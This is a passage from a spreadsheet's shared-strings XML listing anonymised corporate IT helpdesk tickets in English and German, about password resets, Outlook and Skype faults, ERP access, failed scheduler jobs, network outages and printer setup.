  </si>
  <si>
    <t>unable to access easyterritory map view builder</t>
  </si>
  <si>
    <t>crm : voucher - email resend issue</t>
  </si>
  <si>
    <t>when attempting to email a voucher following the standard procedure, i enter the email address and press "send email" and the page goes completely blank.  i then need to resign onto SID_39, and the email has not been sent._x000D_
_x000D_
please review and correct aerp.</t>
  </si>
  <si>
    <t>passwort geoyhurg chriuimjiann</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nsoikcyf.jhybqael@gmail.com
bitte schalten sie meine passwÃ¶rter frei.
plase unlook my password
chrithysgd
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>external recipient is unable to share screen with internal company employees during pstn conference call</t>
  </si>
  <si>
    <t xml:space="preserve">external recipient is unable to share screen with internal company employees during pstn conference call_x000D_
_x000D_
error message: all company users saw a message that read something like "presentation failed since the presenter has left the meeting" even though he was still in the meeting. we agreed to end the meeting once and re-join but the issue didn't go away._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">general query </t>
  </si>
  <si>
    <t>zfliqpxm dgfvaqlh</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_HostName_770_prod_inc failed in job_scheduler at: 10/07/2016 11:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_770_prod_inc failed in job_scheduler at: 10/07/2016 11:48:00</t>
  </si>
  <si>
    <t xml:space="preserve">need converion tool : export a pdf into excel. </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:hello,
i saw on pdf options that it's possible to export a pdf into excel.
do you know who can i contact in company to get this conversion tool?
</t>
  </si>
  <si>
    <t>gxuvbcpr libcktnm</t>
  </si>
  <si>
    <t xml:space="preserve">browser issue : etime: flash player issue/addin issue </t>
  </si>
  <si>
    <t>vupmctne ylnsweao</t>
  </si>
  <si>
    <t>erp changing order qty issue</t>
  </si>
  <si>
    <t>please look at sale order 36112082 csr zektaqof cgxlqtiz released order from workflow and the qty went from 1pc to 12,047,279pcs showing csr changed the qty csr did not change qty please review possible issue maybe wf batch issue</t>
  </si>
  <si>
    <t>zektaqof cgxlqtiz</t>
  </si>
  <si>
    <t>ticket update inplant_867508</t>
  </si>
  <si>
    <t>excel keeps exiting</t>
  </si>
  <si>
    <t>unable to update mileage details. site not loading.</t>
  </si>
  <si>
    <t>erp SID_1 password reset</t>
  </si>
  <si>
    <t>skype meetings</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dlougnqw.jiuybxew@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
can you please assist me with getting the skype meetings back up and running for me?  it came up before but i no longer have the option._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">skype issue ; personal certificate error </t>
  </si>
  <si>
    <t>pos data update - september 2016</t>
  </si>
  <si>
    <t xml:space="preserve">
from: navdgtya kuhyakose 
sent: friday, october 07, 2016 7:37 pm
to: htsnaodb adjtmlzn
cc: petgvwch zevpkogu; khfgharla mwdjuli; vthuzanc fqdgotvx; rzucjgvp ioqjgmah; nawkpdtx gwcvmbhn
subject: pos - septemer '16
hi karghyuen,
i have compared the pos data between crm and bi for september '16 and the data are in sync.
i will run the programdnty on 10/10 to update the table zcp002.
crm                                           bi 
count of mandt sum of toengineering_tool  sum of counter sum of total distributor cost
                     225 82,043.48                             225       82,043.48
</t>
  </si>
  <si>
    <t>cziadygo veiosxby</t>
  </si>
  <si>
    <t xml:space="preserve">hr_tool etime issue </t>
  </si>
  <si>
    <t>error : windows 7 build 7601 this copy of windows is not genuine.</t>
  </si>
  <si>
    <t xml:space="preserve">error : windows 7 build 7601 this copy of windows is not genuine.
for next 2 weeks he will be in usa. 
contact : </t>
  </si>
  <si>
    <t>dcxjngaf zquoewhp</t>
  </si>
  <si>
    <t>audio issue in skype</t>
  </si>
  <si>
    <t>ytqambip bovfzich</t>
  </si>
  <si>
    <t>please allow access for using printer in india office.</t>
  </si>
  <si>
    <t xml:space="preserve">please allow access for using printer in india office._x000D_
_x000D_
please refer the attachment </t>
  </si>
  <si>
    <t>sanoibgk zpuawcbl</t>
  </si>
  <si>
    <t>please to provide access to solman environment - user vvamrtryot.</t>
  </si>
  <si>
    <t xml:space="preserve">please to provide access to solman environment, solman SID_51 (production)  for the user vvamrtryot._x000D_
he need this access to open requests  for theses charms 8111118319  and 8111118310._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool installation </t>
  </si>
  <si>
    <t>outlook not opening</t>
  </si>
  <si>
    <t>hugcadrn ixhlwdgt</t>
  </si>
  <si>
    <t>itylnjqw kqiurhbt</t>
  </si>
  <si>
    <t>unable to see workflow in erp SID_34</t>
  </si>
  <si>
    <t>obvjhlsa jxnlwspq</t>
  </si>
  <si>
    <t>anleitung fuer password_management_tool</t>
  </si>
  <si>
    <t>zgirlxwp kmeaylhi</t>
  </si>
  <si>
    <t>can't access to hr_tool etime</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zywoxerf.paqxtrfk@gmail.com
dear help desk:
i can't access to hr_tool etime, see below:
error 500!
the page you are trying to reach is not available. an internal server error was raised.
x.  jdamieul  fandyhgg
senior staff engineer
zywoxerf.paqxtrfk@gmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">wifi not working : webpages not loading </t>
  </si>
  <si>
    <t>delay in presenting the cal on the polycom phone</t>
  </si>
  <si>
    <t>when a call comes in, its first presented on the computer screen and only a few sec later the phone starts ringing._x000D_
the time between is around 5 sec.</t>
  </si>
  <si>
    <t>user's manager's manager pointing wrongly to vtykrubi whsipqno</t>
  </si>
  <si>
    <t>examples given: shesyhur reports to davidthd and davidthd should be reporting to chukhyt and not ron. like wise, managing_director should be reporting. 
this only happened to records being updated today. see attached screenshots.</t>
  </si>
  <si>
    <t>cfzsajbe lyejkdho</t>
  </si>
  <si>
    <t>call from vendor about crm</t>
  </si>
  <si>
    <t>handscanner an pc evhw8114202 ohne funktion -&gt; rep. oder ersetzen;</t>
  </si>
  <si>
    <t>handscanner an pc evhw8114202 ohne funktion -&gt; rep. oder ersetzen (pc in halle c bei r208 erp terminal)</t>
  </si>
  <si>
    <t>i can't get logged into outlook.  the problem started thursday, october 6 around 430 pm.  reichlhdyl</t>
  </si>
  <si>
    <t xml:space="preserve">
usa
skype is working.
</t>
  </si>
  <si>
    <t>xkmvpaei fizqoprk</t>
  </si>
  <si>
    <t>erp access issue - not authorized for transaction vf02 in SID_1</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000D_
_x000D_
enter user id of user having the issue: hellej_x000D_
_x000D_
transaction code(s) the user needs or was working with: vf02_x000D_
_x000D_
describe the issue: i'm not authorized for transaction vf02 in SID_1. please find attached the error message._x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user: maryhtutina bauuyternfeyt</t>
  </si>
  <si>
    <t>pkjhmfgc zuvjqgwa</t>
  </si>
  <si>
    <t>please reset the password.</t>
  </si>
  <si>
    <t>toeibhlp gukqjwnr</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_488 failed in job_scheduler at: 10/07/2016 06:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_488 failed in job_scheduler at: 10/07/2016 06:59:00</t>
  </si>
  <si>
    <t>pc defekt</t>
  </si>
  <si>
    <t>empw 8111616 01/14 defekt. code: 0x000000ed blue screen</t>
  </si>
  <si>
    <t>crm buttons</t>
  </si>
  <si>
    <t xml:space="preserve">i have recently upgraded our calendar / outlook to the crm software upgrade. i do not have the "track" and "set regarding" toolbar selections as seen in the snap shot below. so the install did not complete. i need the server side synchronization of incoming emails corrected and the crm application permissions for my 2in1. if that is not correct and you believe it to be another issue let me know. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
this is not a phone issue. thus is a notebook or 2in1 issue. please review the snap shots i sent in and advise._x000D_
</t>
  </si>
  <si>
    <t>ktcvsagx vftapxuc</t>
  </si>
  <si>
    <t xml:space="preserve">network outage:russia, engineering_toolkuznetsk site is down at 6:41 am et on 10/07. </t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___________6:41 am et on 10/07. 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___na___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _______na_     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___na________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  _____na__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</si>
  <si>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Job_2049a failed in job_scheduler at: 10/07/2016 06:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2049a failed in job_scheduler at: 10/07/2016 06:05:00</t>
  </si>
  <si>
    <t>install drucker we17\ewew8323647\hnyeajrw ctxjsolz</t>
  </si>
  <si>
    <t>hnyeajrw ctxjsolz</t>
  </si>
  <si>
    <t>install drucker we17\ewew8323646\lxfnwyuv bqmjyprz</t>
  </si>
  <si>
    <t>printing language sa38 (reporting rfumsv00)</t>
  </si>
  <si>
    <t xml:space="preserve">please complete all required questions below.  
if not, it will be returned back to the gsc / requester to provide required information
 â€¢  gsc to review ticket, if not able to resolve then please assign to appropriate group per your printer problem assignment flowchart.
   â€¢  printer name / make - model? kq02 (hp laserjet p3005x)
   â€¢  detailed description of the problem ? wrong carahcters printing reporting rfumsv00. error message "pjl enter language=pcl"
   â€¢  type of documents not printing?  sa38 - reporting rfumsv00 - tax on sls/purch.advanced return 
   â€¢  what system or application being used at time of the problem?     erp
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? it prints, but with wrong language (characters)
   â€¢  if erp system, which system?  SID_34
      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily? no, i tried in another erp printer, issue persits the same.
         what printer can it be rerouted too? not applicable
   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket. (file attached)
sÃ³nia pereira
accounting and report analyst, finance
ojhiaubp.lovgirtm@gmail.com
</t>
  </si>
  <si>
    <t>ojhiaubp lovgirtm</t>
  </si>
  <si>
    <t>kindly install software paint shop and winzip</t>
  </si>
  <si>
    <t>fcqxdusv zvkbhayo</t>
  </si>
  <si>
    <t>install drucker we17 \oziflwma nhgvmqdl</t>
  </si>
  <si>
    <t>benÃ¶tige eine zahlenblock-tastatur fÃ¼r linke hand.</t>
  </si>
  <si>
    <t xml:space="preserve">hallo .
benÃ¶tige eine zahlenblock-tastatur fÃ¼r linke hand.
</t>
  </si>
  <si>
    <t>wtgbdjzl coliybmq</t>
  </si>
  <si>
    <t>EU_tool lÃ¤uft sehr langsam im werk germany. rÃ¼ckmeldungen kÃ¶nnen nicht mehr eingegeben werden (laufzeitfehler).</t>
  </si>
  <si>
    <t>aktuell kÃ¶nnen keine rÃ¼ckmeldungen in EU_tool eingegeben werden. fehler "laufzeitfehler".</t>
  </si>
  <si>
    <t>lpnzjimy mwtvondq</t>
  </si>
  <si>
    <t>stocktransfer  goes not      mm 5112324</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mgahlpwx.jwtfpaxh@gmail.com_x000D_
_x000D_
hello at all_x000D_
_x000D_
istÂ´s not possible to create the delivery note_x000D_
_x000D_
_x000D_
[cid:image001.png@01d2208b.07571691]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>mgahlpwx jwtfpaxh</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063a failed in job_scheduler at: 10/07/2016 05:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063a failed in job_scheduler at: 10/07/2016 05:08:00</t>
  </si>
  <si>
    <t>ethics webportal login issue</t>
  </si>
  <si>
    <t xml:space="preserve">not able login to ethics website, please find the screenshot for the same and kindly help regarding this issue, </t>
  </si>
  <si>
    <t>fmjwzstr yjotleqg</t>
  </si>
  <si>
    <t>pulverleitstand and chargenverwaltung doesn't work corectly</t>
  </si>
  <si>
    <t>pulverleitstand and chargenverwaltung doesn't work correctly. either it runs very slow or it crashes down. there are error messages all the time._x000D_
EU_tool also runs very slow.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/07/2016 04:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/07/2016 04:32:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_512 failed in job_scheduler at: 10/07/2016 04:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_512 failed in job_scheduler at: 10/07/2016 04:14:00</t>
  </si>
  <si>
    <t>automatische datenaufbereitung qa geht nicht</t>
  </si>
  <si>
    <t>automatische datenaufbereitung geht nicht</t>
  </si>
  <si>
    <t>tbioceqj ukjietwz</t>
  </si>
  <si>
    <t>circuit outage:germany: company-eu-deu-erkheim-dmvpn-2821-rtr01 is down since 2:59:20 am et on 10/7/2016.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _______no__     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______2:59:20 am et on 10/7/2016 ________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? _no______    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? _no______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</si>
  <si>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outlook is not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: krilnmcs.chpkeyqb@gmail.com_x000D_
_x000D_
good morning,_x000D_
_x000D_
_x000D_
yesterday i started outlook in the morning._x000D_
_x000D_
_x000D_
as every morning it started very quick but when i tryed to open a mail i received a white screen. i tried several new computer starts but nothing changed._x000D_
_x000D_
_x000D_
so i decided to work via collaboration_platform and i'm doing this right now as well because today i had the same negative result with outlook (start was quick and that's it, no chance to read an email or write one)._x000D_
_x000D_
_x000D_
please have alook into this matheywter because working via collaboration_platform i sless comfortable and slowing down._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>krilnmcs chpkeyqb</t>
  </si>
  <si>
    <t>dba team the imwveudk mykcourx processor has stopped again, please restart!</t>
  </si>
  <si>
    <t xml:space="preserve">dba team. the job processor at the engg application has stopped again. please restart as soon as possible.
dmqxwkfr olmwqzpu
</t>
  </si>
  <si>
    <t>GRP_58</t>
  </si>
  <si>
    <t>dmqxwkfr olmwqzpu</t>
  </si>
  <si>
    <t>plant plant_197/  EU_tool system is running very slowly/ big problems to enter the productions plans</t>
  </si>
  <si>
    <t>abend job bkwin_tax_interface_qa_daily</t>
  </si>
  <si>
    <t>job name:bkwin_tax_interface_qa_daily</t>
  </si>
  <si>
    <t>purchasing, online katalog de-technischer handel funkioniert nicht</t>
  </si>
  <si>
    <t>routing fix in germany</t>
  </si>
  <si>
    <t xml:space="preserve">please add a static route on the lan switch in germany to ensure access to the shop floor network is not disrupted during downtime of the vpn router._x000D_
_x000D_
company-eu-deu-germany-emsw27-3750e-core-sw01#_x000D_
conf t_x000D_
ip route 10.16.56.0 255.255.252.0 10.16.32.40_x000D_
exit_x000D_
copy running-config startup-config_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>need access</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tcbonyes.gpfacron@gmail.com
hello,
i need an access to email address to modify as and when required. please provide me the access for below mentioned mailing addressâ€¦..
k-bnthygl-pdu6-hdjm-er
k-bhrtty-pdlc4-yhhm-er
with best </t>
  </si>
  <si>
    <t>hrt archive jobs are failing</t>
  </si>
  <si>
    <t>hrt archive jobs are failing with error _x000D_
ora-28000: the account is locked_x000D_
br0310w connect to database instance hrt failed</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_tax_interface_dev_daily failed in job_scheduler at: 10/06/2016 22:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_tax_interface_dev_daily failed in job_scheduler at: 10/06/2016 22:32:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_549 failed in job_scheduler at: 10/06/2016 20:57:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_549 failed in job_scheduler at: 10/06/2016 20:57:00</t>
  </si>
  <si>
    <t>ticket update on inplant_867391</t>
  </si>
  <si>
    <t>i cannot extract finance_app data - pls resolve immediately</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uagqromi.sqgtkmci@gmail.com
[cid:image001.png@01d22075.f8d4be00]
uagqromi sqgtkmci
controller
uagqromi.sqgtkmci@gmail.com&lt;mailto:uagqromi.sqgtkmci@gmail.com&gt;
&lt;
[cid:image002.png@01d22075.f8d4be00]
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
[#+company/posts&gt;  [
select the following link to view the disclaimer in an alternate language. </t>
  </si>
  <si>
    <t>uagqromi sqgtkmci</t>
  </si>
  <si>
    <t>unable to install crm for outlook</t>
  </si>
  <si>
    <t>ticket update on inplant_867380</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2881 failed in job_scheduler at: 10/06/2016 18:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2881 failed in job_scheduler at: 10/06/2016 18:06:00</t>
  </si>
  <si>
    <t>outlook programdnty takes about 30 min to load</t>
  </si>
  <si>
    <t xml:space="preserve">password reset to login to hub </t>
  </si>
  <si>
    <t>wbgxieyh zvasjtdc</t>
  </si>
  <si>
    <t xml:space="preserve">need access to folder </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: umdyvbxo.qwzstijr@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i need access to quality folder in lan-d2 drive of usa._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>umdyvbxo qwzstijr</t>
  </si>
  <si>
    <t>engineering tool page not opening</t>
  </si>
  <si>
    <t>analysis add-in keeps getting removed</t>
  </si>
  <si>
    <t>account locked out : ad</t>
  </si>
  <si>
    <t>sales order 36112960 generated a 10/13 delivery date despite the order being markhtyed for 2nd day air.why?</t>
  </si>
  <si>
    <t xml:space="preserve">nibaotpy vmxathog  
</t>
  </si>
  <si>
    <t>erp SID_1 account unlock</t>
  </si>
  <si>
    <t>circuit outage :usa-dmvpn-1811-rtr01 is down since 10/6/2016 1:43 pm. primary is up.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____slo 60 mins_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________10/6/2016 1:43 pm._____________x000D_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</si>
  <si>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please can you unlock the user vvamrtryot on the environment SID_21 again?</t>
  </si>
  <si>
    <t>please can you unlock the user vvamrtryot on the environment SID_21 again?_x000D_
seems is still locked there, only in SID_21, for all other everything is fine.</t>
  </si>
  <si>
    <t>request: team viewer</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sthyuraj.sektyhar@company.com_x000D_
_x000D_
need to access a pc that does not have skype_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">hpqc uacyltoe hxgaycze  installation </t>
  </si>
  <si>
    <t>qscdktvl rihendxu</t>
  </si>
  <si>
    <t>change in offline cache mode in outlook to 12 months</t>
  </si>
  <si>
    <t>erp closes when opening attachment in md04</t>
  </si>
  <si>
    <t>myaornqv fkjmpxbh</t>
  </si>
  <si>
    <t xml:space="preserve">purchasing purchasing-add user to the purchasingupstreamsso ad group </t>
  </si>
  <si>
    <t>when i log in to purchasing and choose company catalog, the window never loads up.</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_1 : password reset </t>
  </si>
  <si>
    <t>ms dynamics not synched in outlook</t>
  </si>
  <si>
    <t>xrqnyzhb oblghuyf</t>
  </si>
  <si>
    <t>issue with outlook profile and skype for business ugyothfz ugrmkdhx ambals</t>
  </si>
  <si>
    <t xml:space="preserve">i was having issues opening outlook and skype for business and reached out to pc services to investigate on this issue. </t>
  </si>
  <si>
    <t>unable to login to erp and distributor_tool</t>
  </si>
  <si>
    <t>qyfrgeop loimdzgs</t>
  </si>
  <si>
    <t>ticket update : inplant_867204</t>
  </si>
  <si>
    <t>4908206193/00001 dn required by 2 oclock est</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kaguhxwo.uoyipxqg@gmail.com_x000D_
_x000D_
it team,_x000D_
please create dn for 5019317204/00001 warehouse today before they cut off time. </t>
  </si>
  <si>
    <t>kaguhxwo uoyipxqg</t>
  </si>
  <si>
    <t>installation of skype</t>
  </si>
  <si>
    <t>lfuzpjvr chmswkvz</t>
  </si>
  <si>
    <t>nda emails are not getting sent</t>
  </si>
  <si>
    <t>ramdnty,  i think the workflows need looked at on the nda,, there are several ttemplates not working.  as a note, during the outage on tuesday several workflows lost their settings.  i had to redo a few.  that may be the case with the nda/</t>
  </si>
  <si>
    <t>qwfztdvc czmndgti</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1387 failed in job_scheduler at: 10/06/2016 11:53:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1387 failed in job_scheduler at: 10/06/2016 11:53:00</t>
  </si>
  <si>
    <t xml:space="preserve">adding user dinthyesh &lt;achthyardk&gt; to distribution group : -ethyxekirty ; -etyhumpdil </t>
  </si>
  <si>
    <t xml:space="preserve">adding user dinthyesh &lt;achthyardk&gt; to distribution group : -exekirty ; -empkirty </t>
  </si>
  <si>
    <t>software to read the text from the scanned pages.</t>
  </si>
  <si>
    <t>unable to view subject option in outlook</t>
  </si>
  <si>
    <t>skype call join ends up in bad call or blanks out during multiple attempts</t>
  </si>
  <si>
    <t>zanivrec capbfhur</t>
  </si>
  <si>
    <t>no login options in erp</t>
  </si>
  <si>
    <t>after netweaver installing it is not possible to log in to erp 740. 
user name: nagdyiyst</t>
  </si>
  <si>
    <t>krdvgzeh yboasemp</t>
  </si>
  <si>
    <t xml:space="preserve">passwort geoyhurg chriuimjiann </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nsoikcyf.jhybqael@gmail.com_x000D_
_x000D_
bitte passwort und acount freischalten_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>sykpe does not work</t>
  </si>
  <si>
    <t>skype does not log me on when i turn on the computer. Phone</t>
  </si>
  <si>
    <t>user account not in validity date.</t>
  </si>
  <si>
    <t>unable to login to erp SID_1. error: user account not in validity date.</t>
  </si>
  <si>
    <t>issues</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lkfzibrx.ljnabpgx@gmail.com_x000D_
_x000D_
hello it team_x000D_
_x000D_
for some reason when i go to some of the folders i got the message belwo i cannot open some folder it appears the message below?_x000D_
_x000D_
i will appreciate your support_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>collaboration_platform table for crm</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: troxyekl.lzdvgwut@gmail.com
hello,
please add user delthybid (jeknosml gkcoltsy) to the collaboration_platform table for crm.
</t>
  </si>
  <si>
    <t>troxyekl lzdvgwut</t>
  </si>
  <si>
    <t xml:space="preserve">account is locked out : ad account </t>
  </si>
  <si>
    <t>not able to print from hr_tool</t>
  </si>
  <si>
    <t>hiysxgwf vqdbtexf</t>
  </si>
  <si>
    <t>reset passwords for gjisfonb odwfhmze using password_management_tool password reset.</t>
  </si>
  <si>
    <t>gjisfonb odwfhmze</t>
  </si>
  <si>
    <t>analysis for microsoft excel is no longer available</t>
  </si>
  <si>
    <t>analysis for microsoft excel is no longer available._x000D_
attached you can find the note.</t>
  </si>
  <si>
    <t>znqlmjvt uhyokzlt</t>
  </si>
  <si>
    <t xml:space="preserve">system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):SID_37
enter user id of user having the issue: hohlbfgtu
:
describe the issue:
unlock password logon
</t>
  </si>
  <si>
    <t>otlqwuks bncsierm</t>
  </si>
  <si>
    <t>vpn access to &lt;achthyardk&gt; computer name: awyl7217972</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:need vpn provision to access m drive from when i am away from office.</t>
  </si>
  <si>
    <t>gflewxmn qnxhoryg (term date 8/31/2016) - network folder access</t>
  </si>
  <si>
    <t>i never received access to tghkris wickhamtf's person folder on the network drive - i did get access to her collaboration_platform drive, but not her network folder.  i know her network folder is where she saved a lot of information - i really need to have access to this folder to access her documents.  also, i'm not sure why the communications i'm receiving regarding her collaboration_platform collaboration_platform are in german. 
die endgÃ¼ltige lÃ¶schung des collaboration_platform for business von gflewxmn qnxhoryg ist in 7 tagen geplant. sie haben immer noch zeit, um wichtige dokumente an einen anderen speicherort zu kopieren. nach 7 tagen wird das collaboration_platform for business von gflewxmn qnxhoryg endgÃ¼ltig gelÃ¶scht. wechseln sie zum collaboration_platform for business von gflewxmn qnxhoryg unter "</t>
  </si>
  <si>
    <t>vpksyfco chosuygq</t>
  </si>
  <si>
    <t>probleme mit com port \maschine stÃ¶hrmann \eaodcgsw trmzwbyc</t>
  </si>
  <si>
    <t>eaodcgsw trmzwbyc</t>
  </si>
  <si>
    <t>cannot access workflow in collaboration_platform designer 2013</t>
  </si>
  <si>
    <t xml:space="preserve">i recently received a new machine for work and downloaded collaboration_platform designer 2013 to access my workflow for my product move system. after linking the site, i tried to open the workflow. it gives me an error saying "cannot access, restart designer and try again." i have tried restarting multiple times. please assist. </t>
  </si>
  <si>
    <t>unable to share screen</t>
  </si>
  <si>
    <t>name:jadqhguy fvwhyenp
language:
browser:microsoft internet explorer
email:jadqhguy.fvwhyenp@gmail.com
customer number:
telephone:
summary:i am unable to share my screen on skype</t>
  </si>
  <si>
    <t>jadqhguy fvwhyenp</t>
  </si>
  <si>
    <t>cannot add new customer in engineering_tool application</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: juxitrbf.vebckrgh@gmail.com_x000D_
_x000D_
dear company help,_x000D_
why i cannot adding new customer in engineering_tool application? this happened after i downloading new update application._x000D_
_x000D_
[cid:image003.jpg@01d2200e.6dd40c50]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>juxitrbf vebckrgh</t>
  </si>
  <si>
    <t>transfer pricing - sto 4908097793</t>
  </si>
  <si>
    <t xml:space="preserve">inter-company sto 5019108804 is not computing a transfer price.  is it because the material is priced at 0.37 euro per 100 pc and the order is only for 1 pc?  should they change the order to 100 pc?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to make changes in expense report</t>
  </si>
  <si>
    <t xml:space="preserve">name: xmeytziq dcgwuvfk
browser: microsoft internet explorer
email: xmeytziq.dcgwuvfk@gmail.com
telephone: 
summary: earlier in the week i was trying to put my expense report in but it will not let me change the cost center there was suppose to be a ticket but in for this and i was just wondering how that was going i have not received any notifications on this issue.  </t>
  </si>
  <si>
    <t>xmeytziq dcgwuvfk</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nsoikcyf.jhybqael@gmail.com_x000D_
_x000D_
bitte schalten sie meine passwÃ¶rter frei_x000D_
_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>configair server not available in production (SID_34). error message: 503 service not available</t>
  </si>
  <si>
    <t>engineering_tool and distributor_tool error.</t>
  </si>
  <si>
    <t>engineering_tool and distributor_tool error. unable to see customer details.</t>
  </si>
  <si>
    <t>insbceoa czgpyrtb</t>
  </si>
  <si>
    <t>frequent account lock out : wothyehre</t>
  </si>
  <si>
    <t>my telephony_software will not allow me to pick up a call or make a call</t>
  </si>
  <si>
    <t xml:space="preserve">my telephony_software will not allow me to pick up a call or make a call
phone: </t>
  </si>
  <si>
    <t>nxloukai cpbzkrel</t>
  </si>
  <si>
    <t>why 2 delivery notes (9169471029) were created for total 10 pcs from plant_105 to plant_322, when on plant_105 we have customer order</t>
  </si>
  <si>
    <t xml:space="preserve">hello, could you please check why 2 delivery notes (9169471029) were created for total 10 pcs from plant_105 to plant_322, when on plant_105 we have customer order 35906675 for 5 pcs and no order on plant_322. we were waiting for this material and once it appeared on plant_105 stock these 2 dn for company europe gmbh - plant_322 were created. i had to ask plant_105 team for cancelation and creation dn for our order. many </t>
  </si>
  <si>
    <t>vgmbxkji jukplihz</t>
  </si>
  <si>
    <t>upload of monthly reports to SID_59 hana tables zmc*</t>
  </si>
  <si>
    <t>urhpnlaf agmsfqil</t>
  </si>
  <si>
    <t>query about ticket status.: ticket_no1556096 : antjuyhony usa</t>
  </si>
  <si>
    <t>ticket_no1556096 : antjuyhony usa</t>
  </si>
  <si>
    <t>wifi not working in conference room of usa oh ...</t>
  </si>
  <si>
    <t xml:space="preserve">wifi not working in conference room of usa oh ..._x000D_
</t>
  </si>
  <si>
    <t>aexbclqv zvapcslb</t>
  </si>
  <si>
    <t>anlagen pc an der hochdrucksinteranlage hip 10 startet nicht!</t>
  </si>
  <si>
    <t>vip 2 // upgrade to ie 11</t>
  </si>
  <si>
    <t>not able to see emails in the outlook</t>
  </si>
  <si>
    <t xml:space="preserve">not able to see emails in the outlook
</t>
  </si>
  <si>
    <t>xioapjvd yiqubxmz</t>
  </si>
  <si>
    <t>kpm hours</t>
  </si>
  <si>
